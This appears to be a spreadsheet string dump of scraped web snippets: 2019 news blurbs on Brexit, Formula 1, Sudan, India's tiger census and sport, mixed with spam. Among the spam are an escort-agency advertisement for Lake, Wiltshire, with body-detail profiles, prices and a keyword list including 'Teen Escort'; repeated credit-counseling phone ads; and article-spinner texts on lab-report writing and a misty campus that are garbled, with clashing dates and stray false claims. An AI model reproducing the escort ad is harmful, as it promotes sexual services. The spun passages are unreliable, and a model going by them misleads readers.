for no-deal Brexit preparations – paper. appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Welcome to escorts in Lake SP4, covering the whole area of Wiltshire. We have escorts serving the flats, homes and local hotels in Lake and the surrounding Wiltshire areas. Lake Escort Wiltshire Escort Services Lake Escorts - Girls Who Know How to Fulfill You in Wiltshire There are quite a lot of men who like to enjoy the companionship of women as much as they can. They want to be with as many different types of women as possible since they love to experiment. However, when the time comes to face reality, they realize that it is not easy to meet women of different types and to date, them is all together with a different issue. However, when you are in Lake, things can be different for you. If you have been to the area, you would have seen the number of beautiful women that are walking around. Some of these are Lake escorts who would be ready to date you when you are in the area. Lake escorts are women who receive hundreds of compliments from their men because of the type of services that they provide them. There are quite a lot of escorts in the area, but not all of them can deliver what they promise. When you hire a beautiful companion tonight, only go for the best one who will compliment your personality. Go for the best escort agency and finding the best escort would not be very difficult. She can perform for you, and she can wonderfully caress you. You can evaluate the services of these ladies and compare them to the services provided by other escorts to know where these wonderful ladies stand. These escorts have a talent, and they want to be appreciated for it. With these ladies, you can finally be a man that you always wanted to be. These Lake escorts will bring out several qualities in you which will leave you pleasantly surprised. Age is just in mind and, it doesn’t matter anyway when you are with these women. There are quite a lot of men who feel depressed as they get older since they think that their years of fun are over for good. They believe that with age, they would no longer be able to enjoy the companionship of women at all. However, now you can not just enjoy being with Lake women, but you can be with sexy, hot, young women who would make you grow wild with desire. Escort Name: Saige Location: Lake (SP4 7) Nationality: Uruguayan Spoken Language: English, Chinese Age: 19 years old Weight: 46.8kg (103lb) (7st - 5lb) Height: 6 feet 1 inches (185.45cm) Dress Size: M Shoe Size: 40 Hair Leigh: Medium-Length Hair Color: Jet Black Eye Color: Blue Breast: Silicone Breast Size: B Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Yes Drinking: Yes Availability Area: Lake Outcall: Wiltshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Saige Escort Name: Mariella Location: Lake (SP4 7) Nationality: Uruguayan Spoken Language: English, Croatian Age: 36 years old Weight: 62.7kg (138lb) (9st - 12lb) Height: 5 feet 8 inches (172.72cm) Dress Size: S Shoe Size: 36 Hair Leigh: Long Hair Color: Blonde Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: No Smoking: Occasionally Drinking: No Availability Area: Lake Outcall: Wiltshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Mariella Escort Name: Bambi Location: Lake (SP4 7) Nationality: Turkish Spoken Language: English, German Age: 28 years old Weight: 59.1kg (130lb) (9st - 4lb) Height: 5 feet 7 inches (170.18cm) Dress Size: L Shoe Size: 40 Hair Leigh: Medium-Length Hair Color: Blonde Eye Color: Violet Breast: Natural Breast Size: C Pubic Hair: Shaved Completely Tattooed: No Piercings: Yes Smoking: No Drinking: Occasionally Availability Area: Lake Outcall: Wiltshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Bambi Escort Name: Ines Location: Lake (SP4 7) Nationality: Icelandic Spoken Language: English, Croatian Age: 28 years old Weight: 49.1kg (108lb) (7st - 10lb) Height: 5 feet 5 inches (165.10cm) Dress Size: L Shoe Size: 36 Hair Leigh: Very short Hair Color: Black Eye Color: Violet Breast: Natural Breast Size: H Pubic Hair: Shaved Mostly Tattooed: Yes Piercings: No Smoking: No Drinking: No Availability Area: Lake Outcall: Wiltshire Incall Rates Start: from £100 p/h Outcall Rates Start: from £120 p/h Book Ines Lake Brazilian Escort, Lake Scottish Escort, Lake Walsh Escort, Lake Independent Escort, Lake Female Escort, Lake Cheap Escort, Lake Chinese Escort, Lake Blonde Escort, Lake Incall Escort, Lake French Escort, Lake Black Escort, Lake Outcall Escort, Lake Bisexual Escort, Lake Irish Escort, Lake Mature Escort, Lake British Escort, Lake Brunette Escort, Lake Horny Escort, Lake Asian Escort, Lake Gay Escort, Lake Busty Escort, Lake Young Escort, Lake Male Escort, Lake Ebony Escort, Lake Indian Escort, Lake Indian Escort, Lake Massage Escort , Lake Polish Escort, Lake Porn Escort, Lake Teen Escort, Lake Best Escort, Lake Agency Escort, Lake Erotic Escort, Lake Spanish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Lake appeared first on Escort Info UK.</t>
  </si>
  <si>
    <t>Foxtel chief executive Patrick Delany says there is no growth left for the pay TV platform and is pinning his hopes on streaming to secure its future.</t>
  </si>
  <si>
    <t>Celebrity chef George Calombaris tells 7.30 he is sorry for underpaying his restaurant staff and hopes he can now be a "voice for change" in the hospitality industry.</t>
  </si>
  <si>
    <t>NASA made a “startling discovery” about Saturn’s rings that could suggest they are much younger than previously thought, a documentary revealed. The post NASA bombshell: How ‘startling’ Saturn discovery stunned scientists appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Kate Evans</t>
  </si>
  <si>
    <t>Too Much Lip is a raucous family yarn that explores intergenerational trauma, class and the lives of Aboriginal women, and it has just won its author a prestigious $60,000 prize.</t>
  </si>
  <si>
    <t>Dave.Schofield</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports Utilizing the second-year stats of other highly-drafted Steelers safeties to hypothesize Edmunds’ 2019 output. The expectation doesn’t change regardless of pedigree. Whether a player is drafted in the first round or an undrafted free agent, any NFL player entering their second year has an expectation of noticeable improvement. From the physical demand of a long season to understanding the game at the NFL level and the speed in which it is played, there is much to learn in a player’s first offseason. For the Steelers’ Terrell Edmunds, 2019 brings the same expectations of improvement as all of the other 2018 rookies. While many think Edmunds had a solid rookie season, others are very quickly to place him in the “bust” category if he doesn’t show vast improvement. Unlike most rookies, Edmunds had plenty of in-game experience last season as he started 15 games and logged the second most defensive snaps only behind Sean Davis. But what will the 2019 season bring for Terrell Edmunds? What kind of jump could we expect? The best idea I had to project Edmunds jump from year one to year two was to look at two highly-drafted safeties who were full-time starters their second season: Sean Davis and Troy Polamalu. The statistics I’ve decided to outline are interceptions, passes defensed, forced fumbles, sacks, total tackles, and solo tackles. Sean Davis In 2016, Sean Davis started nine games as a rookie and logged 740 defensive snaps. In his second season, Davis started all 16 regular-season games and increased his defensive snaps to 948. With the exception of sacks, Davis increased in the other five statistical categories. Davis played 28.1% more stats from year one to year two, but saw a much higher percent increases in interceptions, passes defensed, and forced fumbles. In both categories of tackles, the percent increase was very similar to the increase in snaps. The exact statistics for each year and the change are listed below. Troy Polamalu Although he appeared in every game, Polamalu did not start at all his rookie season in 2003. By his second year, Polamalu started all 16 regular-season games. Unfortunately, I was unable to find snap counts before 2012, so the only gauge is the massive increase in games started. Just like Sean Davis, Polamalu’s sacks sightly dipped his second season. Other than having the same number of forced fumbles, Polamalu saw massive increases in the other statistical category. Terrell Edmunds When it comes to comparing his rookie statistics to Davis and Polamalu, Edmunds was very similar in interceptions, passes defensed, forced fumbles, and sacks. Edmunds did have a significant larger amount of tackles which can most likely be attributed to a larger number of games started and snaps played. Below is a list of Edmunds’ first year stats and my projection for his statistics for this coming season. Reasoning So why did I come up with these numbers? First off, these stats are assuming Edmunds starts all 16. When it came to tackles, both Davis and Polamalu had similar year-two totals so I had Edmunds numbers follow suit. Since neither Davis or Polamalu saw an increase in sacks, I kept Edmunds at the same total as 2018. With the other statistics, I started with a similar increase but adjusted some totals down due to the fact Edmunds will not have as much of an increase in playing time from year one to year two. So the final statistical line I project for Terrell Edmunds in 2019 is two interceptions, seven passes defensed, one forced fumble, one sack, 92 total tackles, and 68 solo tackles. So what do you think? Are these statistics a reasonable estimate? Or are they too high or too low based on your projections? Make sure you vote in the poll below and leave any explanations in the comments.</t>
  </si>
  <si>
    <t>Consult your medical care provider if you will need to do anything to get ready for your test. Your instructor might would rather have a third person standpoint. If you perceive graduate school as your only option, you are going to be psychologically labile, inclined to find a little desperate and insecure, and you will not have the capability to provide your finest. Still others might include text, including the name of bacteria for the effect of a sample taken from an infected website. writing a lab report Attempt to abstain from making use of a table to articulate any facet of the experiment you can address in 1 sentence of text. A great instance is provided below. The hanging mass ought to be just under the sensible pulley. The element iodine’ in your diet plan program, plays an important role in maintaining thyroid health. The perfect place to look is the lab manual. Most readers won’t locate the table clearer than that 1 sentence. You shouldn’t assume, however, that this organization will serve all of your laboratory reports. http://sps.columbia.edu/negotiation-and-conflict-resolution Click to discover more on the subject of the Healey Fellowship reception. The quantity of information reported in the typical scientific paper might be less than you believe. Some of us will read the summary and just skim the report, so make certain you include each of the appropriate details. You might want to present your report in an easy and concise style that isn’t hard to read and navigate. Satirical documents are usually discussed issues that were dubious to attempt to persuade the. It’s rarely used and is just for long reports. Handwritten reports aren’t acceptable. You may never prove a hypothesis. The hypothesis ought to be clear and explicit. A helpful hypothesis is a testable statement which might incorporate a prediction. Ensure the data which you put in the outcomes are solely based in your experiment. lab report writing Based on the aim of the titration, more detail may be required. You may have to give an explanation of where you got your information, dependent on which type of research you would need to do. Different women and men need various approaches. To start with, a lot of people maintain that you ought to write down your working hypothesis before you start the experiment or study. Set the statement of the issue initially and if applicable, put down what is the function of the analysis. Here’s What I Know About How to Start Lab Report Learning is just a procedure for transfer. Students will adhere to the instructions on the lab sheet to do the serial dilutions for their sample. They do not need to download application to their computer. Your task is to check the generic vs. named brand edition of an item of your option to see which is the most effective. No it is not it is a security tool. Nowadays you’ve assembled all the parts of the Flash Report, it’s the proper time to examine your results. Writing an excellent lab report isn’t a very simple endeavor taking a look at the degree of skill required. Some students face a fantastic challenge when they have to deal with a huge influx of writing assignments. Last year students often discover that it’s hard to opt for an acceptable research topic for their psychology lab file, and usually try to make things more complicated than they have to be. Collaborative work a part of doing science. Lists can be numbered or bulleted. It affords you the opportunity to set yourself apart from other students in the class who are not thinking beyond the rudimental aspects of the study. Back track Next tip is to have a look at the blog beginning from the previous term. The very last thing you need to do really is to earn a report you won’t require. Establish all the things you would need to learn throughout the entire practice. Use hash tag and you’ll draw much more readers. Say what your findings mean for the manner that individuals behave in the authentic world. A good deal of eminent people began with a minor bit of work. Use the help of authentic academic pros and possess the services that you’ve gained! Explain to our experts what kind of groundwork assistance online you must get. You could consider employing each assignment to practice various approaches to drafting the report, to get the order which works best for you. Other research questions for the organization will center on how to improve transportation equity, Brown states. You will get an opportunity to adhere to the progress and request changes if necessary. Otherwise, perhaps you’ve just supplied a summary as opposed to creating a debate. The Downside Risk of How to Start Lab Report Table 2 shows the nationwide proportion of backlogged cases in the many disciplines, in addition to the percent boost in full time staff necessary to get rid of the backlogs. Be aware the results that you expect to find. Don’t go over the results. The truth is B12 may increase someone’s risk of lung cancer. If your urine glucose test a part of a urinalysis, you will want to give a sample of your urine. You may receive a glucose in urine test as a portion of your routine checkup or whenever you have symptoms of diabetes and can’t take a blood glucose test.</t>
  </si>
  <si>
    <t>Azerbaijani Persian Dictionary – travel dictionary to translate Azerbaijani to Persian. Click on the list to show Azerbaijani or Persian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Azerbaijani Persian Dictionary →</t>
  </si>
  <si>
    <t>Melissa Woods</t>
  </si>
  <si>
    <t>Melbourne coach Craig Bellamy has hinted that Manly coach Des Hasler is behind the attack by Sea Eagles great Max Krilich on Storm captain Cameron Smith.</t>
  </si>
  <si>
    <t>Do you need for any flooring installed? – – – – – – – – – – – – – – – – – – – – – – Experienced flooring installers can install your new flooring. Nice and clean with the best quality installation !!! The installation of laminate flooring done by the experienced .. Read more</t>
  </si>
  <si>
    <t>It was a big weekend for Marvel fans, but it isn't just superheroes to get excited about from Comic-Con.</t>
  </si>
  <si>
    <t>The special meeting comes two weeks after Prime Minister Justin Trudeau nominated Kasirer to fill a vacancy created by the coming retirement of Justice Clement Gascon.</t>
  </si>
  <si>
    <t>Public transport isn't a dirty term in other parts of the world, and with the cost of car ownership getting higher, why aren't more considering Transperth for their commute?</t>
  </si>
  <si>
    <t>The tiny Canadian town of York Landing has gone into "lock down" as police continue the search for the two teenagers suspected of killing Lucas Fowler and his girlfriend.</t>
  </si>
  <si>
    <t>Struggling to find a rental? You’re not alone.</t>
  </si>
  <si>
    <t>Bumi Thomas, a jazz artist who thought she was a British citizen, is now facing deportation from the UK. Read more? Click here</t>
  </si>
  <si>
    <t>Craig Venn</t>
  </si>
  <si>
    <t>Lando Norris believes “points were definitely possible” were it not for a loss of power that lead to his retirement from the 2019 German Grand Prix. In what was his first experience of Formula 1 racing in the rain, Norris started from nineteenth after a poor qualifying and a grid penalty. The McLaren F1 Team rookie climbed as high as thirteenth in the early stages of the race despite “poor visibility” and the “very slippery” track surface. But on lap twenty-five he suffered a loss of power from his Renault power unit and pulled off the circuit, posting his third retirement of the year as team-mate Carlos Sainz Jr. enjoyed a fight for the final podium position. “The start was tricky because of poor visibility and it was still very slippery even on Wets,” said Norris. “Everything was going okay, making up some positions here and there when we didn’t box under the first Safety Car, which in hindsight may have been the wrong decision. “I made up a couple more places after boxing onto Inters and my pace was good before I stopped for slicks, as it had dried just about enough. I got ahead of the Toro Rosso immediately after that stop on the back straight. Things were looking good but then the car lost power. It’s a shame as points were definitely possible in what was a manic race.” With his team-mate Sainz Jr.finishing fifth in Hockenheim, McLaren are now in a clear fourth in the constructor’s standings, twenty-eight points ahead of Scuderia Toro Rosso. Norris himself has slipped to tenth in the drivers’ standings on twenty-two points, twenty-six points and three positions behind his more experienced team-mate.</t>
  </si>
  <si>
    <t>THE Fortnite World Cup Finals start later this week, with a full release date schedule confirmed by Epic Games, including news regarding the Season 10 Battle Pass. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>Former senior cabinet members are determined to bar PM’s way to no-deal BrexitFollow all today’s politics with our live blogBoris Johnson will be forced to contend with a “Gaukeward Squad” of former cabinet ministers who have resigned from government determined to block a no-deal Brexit, senior party sources have warned.The former chancellor Philip Hammond is expected to lead the group who stood down on Wednesday before they could be sacked by the new prime minister. They include David Gauke, the former justice secretary, Rory Stewart, the former international development secretary, and David Lidington who left the Cabinet Office. Continue reading… Read More</t>
  </si>
  <si>
    <t>Staff reporter</t>
  </si>
  <si>
    <t>Amy Louise Gibbs was last seen leaving a pastoral station 100km south-west of Karratha.</t>
  </si>
  <si>
    <t>NEW data has revealed that a huge amount of motorists have worn brakes and tyres on the roads in Britain risking a big fine and failed MOT test. Daily Express :: Cars Feed MOT shock – Majority of cars have worn brakes or tyres risking huge fines</t>
  </si>
  <si>
    <t>abdallah</t>
  </si>
  <si>
    <t>Street Fighter is the main event of Evo, the largest annual fighting games tournament in the world. This was true in the now ancient past of the event, in the heights of Street Fighter IV and even in the less glorious days of Street Fighter V. These days end at Evo 2019 because the final schedule confirms that the Capcom fighter was struck from the top slot. The final place will go to Super Smash Bros. Ultimate, which will close the show on Sunday August 4th. The Sunday final will start with BlazBlue Cross Tag Battle, then we will have Street Fighter V, then Tekken 7 finish on Smash. We will attend the finals of Soulcalibur VI on Friday and Saturday, in this order, UNIST, Dragon Ball FighterZ, Samurai Shodown and Mortal Kombat 11. Ultimate Smash has attracted many more players than any other fighter this year, in part because the aging old Melee has been removed from the list, so that the Smash community can now regroup around a single game at Evo. This is not the first time that Street Fighter V is in second place in terms of numbers, as it was slightly behind last year against a new Dragon Ball FighterZ.</t>
  </si>
  <si>
    <t>Foreign Correspondent examines US start-ups' plant-based and cell-based meat substitutes.</t>
  </si>
  <si>
    <t>Egyptian President Abdel Fattah el-Sisi has met in Cairo the deputy head of Sudan’s ruling Transitional Military Council (TMC), General Mohamed Hamdan Dagalo, whose forces have been accused of carrying out a brutal crackdown on pro-democracy demonstrators in June. Dagalo, who is widely known as Hemeti and is seen as the most powerful of the generals now running Sudan, “presented the latest developments on the current situation”, the Egyptian presidency said after Monday’s meeting in the capital. El-Sisi, a former army chief, reiterated Egypt’s “strategic support” in maintaining “the stability and security” of its neighbour, Sudan, the presidency added. Egypt‘s government has been a strong backer of the TMC after the military overthrew longtime President Omar al-Bashir on April 11 in the wake of months-long mass protests against his three-decade autocratic rule. Hemeti, the commander of the Rapid Support Forces (RSF) – the feared paramilitary group accused of war crimes in Darfur under al-Bashir – has also shored up support from Gulf allies, meeting Saudi Arabia’s Crown Prince Mohammed bin Salman in May. His meeting with el-Sisi came a day before talks between the TMC and the protest leaders were set to resume. On July 17, the two sides signed a power-sharing deal aimed at forming a joint civilian-military ruling body which, in turn, would install civilian rule. The negotiations on Tuesday are meant to iron out remaining issues between the two sides. Protesters killed The protests in Sudan were triggered in December following the tripling of the price of bread but quickly transformed into a challenge to al-Bashir’s rule. Demonstrations continued after his removal as protesters intensified their demands for a transition to civilian rule. On June 3, at least 127 demonstrators were killed and scores wounded in a raid on a sit-in, the rallying point in the protest movement’s struggle for democracy, according to doctors linked to the protest movement. A joint probe by prosecutors and the TMC on Saturday said that security forces, including an RSF general, took part in the raid on the protest camp outside the military headquarters in the capital, Khartoum, despite having no orders from their superiors to do so. Hemeti has consistently denied that his men were involved in the crackdown, which triggered international outrage. On Sunday, Sudanese police fired tear gas at scores of protesters demanding an independent probe into the June raid. Separately, the doctors’ committee linked to the protest movement said on Monday that five protesters, including four students, were shot dead and several wounded at a rally in a town in central Sudan. “Five martyrs succumbed to direct wounds from sniper bullets during a peaceful rally in al-Obeid,” the committee said in a statement. The reason for the rally was not immediately clear. SOURCE: Al Jazeera and news agencies Source link</t>
  </si>
  <si>
    <t>Gloria Henriquez</t>
  </si>
  <si>
    <t>The Canadian Federation of Municipalities is asking candidates running in the upcoming federal election to commit to doubling their annual Gas Tax Fund Transfer or GTF once they come into power.</t>
  </si>
  <si>
    <t>HAMILTON — The Hamilton Tiger-Cats could be without three players, receiver Brandon Banks, offensive lineman Darius Ciraco and defensive end Adrian Tracy, when they travel to Regina to take on the Saskatchewan Roughriders this week. According to a report from TSN1150’s Kyle Melo, all three players are set to be evaluated on Tuesday before a decision is made on whether they will play on Thursday. Orlondo Steinauer said Ciraco, Tracy and Banks will all get evaluated today before a decision is made on whether they will play vs SSK. #CFL #Ticats #HamOnt — Kyle Melo (@TSNKyleMelo) July 30, 2019 All three players missed practice on Tuesday. Ciraco and Banks did not practice Monday while Tracy attempted to but did not make it through the entire session. Banks has played in six games so far this season for the Tabbies and has accumulated 554 yards and three touchdowns on 61 catches. He’s also made a return to special teams, collecting 50 punt return yards, 235 missed field goal return yards and two missed field goal return touchdowns. Tracy has seen action in five games and has collected seven defensive tackles, three sacks and two forced fumbles while Ciraco has suited up in six contests. Kickoff between the Ticats and Riders is at 9:30 p.m. ET on Thursday night.</t>
  </si>
  <si>
    <t>Megan Gorrey</t>
  </si>
  <si>
    <t>The City of Sydney says each year almost 500,000 fewer people aged under 35 have visited Sydney, with the council blaming lockout laws.</t>
  </si>
  <si>
    <t>Director Jon Favreau explains how technology allowed the film to obtain a documentary look. The post The Lion King – how VR brought the animals to life appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>James Eagles</t>
  </si>
  <si>
    <t>Max Verstappen believes Red Bull Racing can be in contention for major honours at the German Grand Prix alongside its Formula 1 rivals Scuderia Ferrari and Mercedes AMG Motorsport with some “fine-tuning”. Verstappen was the lead Red Bull car in both Free Practice sessions at Hockenheim on Friday, as team-mate Pierre Gasly ended his day in the wall at the final corner in a frustrating day for the Austrian team. Gasly damaged the two corners on the left-hand side of his RB13 after a snap of oversteer going through the medium-speed right-hander of Turn 17. The Frenchman’s average deficit to Verstappen over the two sessions stood at 0.719 seconds, the Dutchman triumphing by almost a whole second in Free Practice 2. But Verstappen lagged behind the leading trio of Charles Leclerc, Sebastian Vettel and Lewis Hamilton in the afternoon, falling from around three-tenths off the pace to 0.684s behind – he was closer to the second Mercedes of Valtteri Bottas, but the Finn suffered with tyre temperatures on his qualifying runs. “Today was okay. We haven’t quite found the perfect balance yet but we are also not too far behind,” said Verstappen. “In Practice 2 I didn’t have a clean lap on the softest compound as I had to abort and around here it is really a one lap tyre. “I ended up doing extra laps on the tyre and the peak of the grip was gone.” Verstappen admitted that Red Bull is behind the front two, but hopes that a few tweaks will bring a positive impact on performance. Credit: Getty Images/Red Bull Content Pool Stormy conditions are forecasted through Saturday, which could shake the top order and make for an intense battle for pole position. “We are a little bit behind Mercedes and Ferrari but with some fine-tuning it will be ok and I think we are better than the times from [the afternoon] show,” Verstappen added. “It’s always good to get plenty of running on a Friday, even if the conditions are going to change, as you can still get an understanding and find the right direction for the rest of the weekend.” Gasly meanwhile explained that his lack of pace in Practice 2 was down to a “couple of issues” that prevented him from setting a proper lap time and left him a lowly fifteenth in the standings, behind both Scuderia Toro Rosso cars. He apologised to his team of mechanics but said that at least his race gearbox and engine was not in the car at the time of his crash. “It was quite a tricky day today,” said Gasly. “We managed to get some decent laps during FP1 and the feeling with the car was good. “We completed the normal tests and then in FP2, we had a couple of issues which meant we didn’t get a short run on soft tyres and that put us back in the classifications, but the feeling was still good. “Unfortunately, towards the end of the session I lost the car exiting the final corner during a long run and hit the barrier. “Fortunately I wasn’t using my race engine or gearbox, but more importantly I’m really sorry for the boys in the garage and I want to apologise to them as the repairs will make for a long night.”</t>
  </si>
  <si>
    <t>B.C. had more first downs, offensive yards and possession time than the Riders last weekend, but ended up losing 38-25.</t>
  </si>
  <si>
    <t>Armenian Russian Dictionary – travel dictionary to translate Armenian to Russian. Click on the list to show Armenian or Russian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Armenian Russian Dictionary →</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. A's lefty Sean Manaea blanks red-hot Red Sox for MLB's first no-hitter of 2018 Thursday 25 July 2019 05:33 AM UTC-05 | Tags: credit-counseling from https://firmadeabogadosmedellin.blogspot.com/p/tuscaloosa-alabama-consumer-credit.html Downtown Chandler Arizona Free Consumer Credit Counseling Service Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, #Downtown #Chandler https://www.youtube.com/watch?v=LrgOi_dw7sQ https://www.youtube.com/channel/UCjw87PuDw_wLAiBimMvyA7w/videos copyright © 2016 Privacy Policy Tags: credit-counseling</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. U.S. coastal areas flooded more than ever in past year due to sea-level rise and storms Friday 19 July 2019 11:44 PM UTC-05 https://m.youtube.com/watch?v=FQEzmIAx9L8 Tide gauges at 98 coastal locations indicated flooding on a record-breaking six days on average.</t>
  </si>
  <si>
    <t>A dubious forward pass denied the Warriors a win against the Eels, who kept their top-four hopes alive.</t>
  </si>
  <si>
    <t>India’s tiger population has increased by more than 30 percent in the last four years, according to a new census, raising hopes for the survival of the endangered species. The census, released on Monday to mark the Global Tiger Day, found 2,967 tigers in the wild across India, up from 2,226 four years ago in what Prime Minister Narendra Modi hailed as an “historic achievement”. “We reaffirm our commitment towards protecting the tiger,” Modi said in the Indian capital, New Delhi, as he released the All India Tiger Estimation Report 2018. “Some 15 years ago, there was serious concern about the decline in the population of tigers. It was a big challenge for us but with determination, we have achieved our goals,” Modi said, adding that India was now home to three quarters of the global tiger population. The massive surveys are conducted every four years in India, with the latest census spanning 15 months and using 26,000 camera traps that took almost 350,000 images across known tiger habitats, Environmental Minister Prakash Javadekar said at the census release. Images that showed the big cats were analysed using computer programmes to individually identify each creature. Wildlife and forestry officials said they scoured 380,000 square kilometres of terrain for the census. In 1900, more than 100,000 tigers were estimated to roam the planet, but that fell to a record low of 3,200 globally in 2010. That year, India and 12 other countries with tiger populations signed an agreement to double their big cat numbers by 2022 – which India has now done. Some 26,000 camera traps took almost 350,000 images across known tiger habitats for the census [File: Satyajeet Singh Rathore/AP] The population of wild tigers in India has risen steadily since falling to the lowest-recorded figure of 1,411 in 2006. However, they are yet to return the figures recorded in 2002, when some 3,700 tigers were estimated to be alive in the country. It is believed that some 40,000 tigers lived in India at the time of independence from the United Kingdom. Wildlife experts lauded the government efforts and said the rise in numbers heralded a new chapter in the conservation of the big cats in India. “The scale and magnitude of the assessment is unparalleled globally,” Global Tiger Forum secretary-general Rajesh Gopal said. Man-made problems Authorities across Asia are waging a major battle against poachers, who often sell tiger body parts to the lucrative traditional Chinese medicine market, as well as other man-made problems such as habitat loss. India has sought to improve its management of the predator, reserving 50 habitat – from the Himalayan foothills in the northeast to regions in west and central India – exclusively for the animals. At the same time, however, the country’s growing population has increasingly encroached into the territory of the wild animals, pushing them into frequent conflicts with humans. More than 60 tigers have died or been killed so far this year across India, according to government figures. It is a crime to kill tigers, which are categorised as endangered under India’s Wildlife Protection Act. Last week, a tigress was beaten to death by a mob, a day after it mauled one person to death and injured eight others. Another tigress and her two cubs died last month after villagers poisoned the carcass of a cow it had hunted a day earlier. Around 30 people were killed by tigers in India last year, according to the government. Source link</t>
  </si>
  <si>
    <t>Gulf Coast Road Trip | #Texplorer The post Gulf Coast Road Trip | #Texplorer appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>A gorilla called Trudy, who is believed to be the oldest western lowland gorilla in captivity, has died in the US at the age of 63. Read more? Click here</t>
  </si>
  <si>
    <t>Drop Ship Lifestyle</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V Copy These eCommerce Sales Funnels to increase your average order value! In this video I share funnels that work in Shopify AND in ClickFunnels (or in any … source</t>
  </si>
  <si>
    <t>Yes, they’re a little pricey and missing water resistance, but the WF-1000XM3 are among the best true wireless earphones of 2019…. CNET Reviews – Most Recent Reviews The post Sony WF-1000XM3 review: A top-notch true wireless headphone with active noise cancellation – CNET appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Source: https://www.bbc.co.uk/news/business-49064504 Body-worn cameras to be compulsory for bailiffs The government says the move will help tackle “intimidation and aggression” used by some bailiffs. Source: https://www.bbc.co.uk/news/business-49064504 The post Body-worn cameras to be compulsory for bailiffs appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>But would they have made him nightwatchman?</t>
  </si>
  <si>
    <t>The incident happened Monday in the backcountry about two hours north of Powell River on the Sunshine Coast.</t>
  </si>
  <si>
    <t>latimerfireprotection</t>
  </si>
  <si>
    <t>Tufts inside Mist; or maybe a Gothic Storyline September 26th, 2017: Day 2 Today, even while crossing journey on the way back, the heavens started to stuff with mist. It was the kind of mist of which suffuses every thing; not the opal-pale just one, but the one distorts the sunshine, everything flecked with greyish, or smoke cigarettes, or the fact that something indistinct, almost over and above colour. That it was especially lousy on the streets; with the streetlights, everything was a shapeless bright. Solely the houses were spared; status apart, while they were, these were darkly large, more defined for being at midnight. Walking on the particular pavement, I just felt the border when the wet on my skin – the mister system, light obscuring everything, and also the inky definition of night. Just, as they designed turns, basically made massive amounts of light. April 27th, 2017: Evening 2 Often the mist extended today; in the event that anything, it had been even a tiny bit worse, a lot more indistinct versus the day ahead of. I really undertake hope the rainy day improves by Spring Fling; it’s been fearfully dreary a final two years, and I was really looking for some the sun this year. It seems a bit sardonic, but you can only really let how negative the mister system is when light shows it. About by the intersection of Celtics Avenue and even Winthrop, from where the traffic is actually heavy, the mist is situated damply about everything; the actual streetlights, page views lights, store lights, all that light suffusing, flooding the main intersection inside white. Costly ukessays discount code are still different, but actually their alerts are terribly bright, just about distracting from your cars theirselves. Spring 29th, Working day 4 My spouse and i never really recognized that puritanical, Gothic horror until now; Boston was usually oscillating amongst the terrible environment of wintertime and the daunting weather for might-as-well-be-winter, when using the occasional wonderful sunset colouring pens the mountain tops. But now, utilizing this mist, the following indistinct, soggy, wet water… walking alongside Professors Strip, Ballou equipment at the top of the exact hill, this ominous, menacingly lit up structure, the actual spectre with the administration around campus. Plus walking in place Packard, Western side is almost indistinct; you can just tell the difference around its gables and the nighttime sky, along with the glow on the rooms, however warm, nearly seems like the main licks for flame for wood. May first, Day six I’ve recognized the mister system only definitely sets in during the night, right since the dining seuil are final and they give up you out and about. It’s nearly spectacular, in any other case for the incontrovertible fact that everything is actually perpetually fuzzy, as if your eyesight’s many wrong. Walking past the area of Boston Ave, along the route back home, I’m struck because of the train tracks; within the golden time of celestial, or a fantastic sunset, or on a very clear day, the tracks will be lit upwards, an Instagram picture patiently waiting to happen. Yet, now, menacingly painted throughout mist, they seem like some road to help nowhere, but everywhere; as though you could exclusively get past the main fence, and walk on the edge of the black, plus brush additionally the inky softness… However , I digress; I just about want to take a picture, but with supreme, I maintain feeling enjoy I can’t stick around, like Making it very be in doing something different. Could possibly, Day twelve Carm, despite the fact that decked out on lights, is just more concealed now. Whenever West is indistinct apart from the spark of hearth, Carm is practically a imaginative and prescient vision of whiteness, like this grounds in the winter. Throughout the Res Quad are signals, but no place more so rather than Carm; a person normally certainly notice the item, except for this unique pervasive air. In the midst of the actual indistinct eyeball, Carm appears a idea, like a ram of someplace else. Walking back, I could practically fancy i see by myself walking here we are at Carm also, sophomore yr, hoping towards hope that the hot water appeared to be running. Day of sixteen This air is still right here, like the many miserable temperature I’ve ever endured at Tufts, and that’s along with experiencing the snowstorm of 2015 as a youngster from a warm island. Jogging up Packard, the misting only makes worse in addition to worse; typically the tennis courts are a surface of light regularly now, a new whitefire fire you can see the second you transform onto Seasoned pro Row. Disembodied, the floodlights seem indifferent, weightless, over – which means that blindingly glowing, their glare almost just like the eyes associated with heaven, judging, watching. You won’t ever realize what amount light there is certainly, constant, countless light, in the course of campus, in streetlamps, computers, glowing in the mist, moisture visible, always everywhere, until you look on the mist. Day The mist is certainly everywhere right now. It almost feels like it’s sneaking into the buildings – nonetheless I know it could just our glasses all of fogged right up, dust as well as other particles confined on the contact lenses. I know I can wash these, but with terminal it always feels like there isn’t a time; nevertheless everything’s 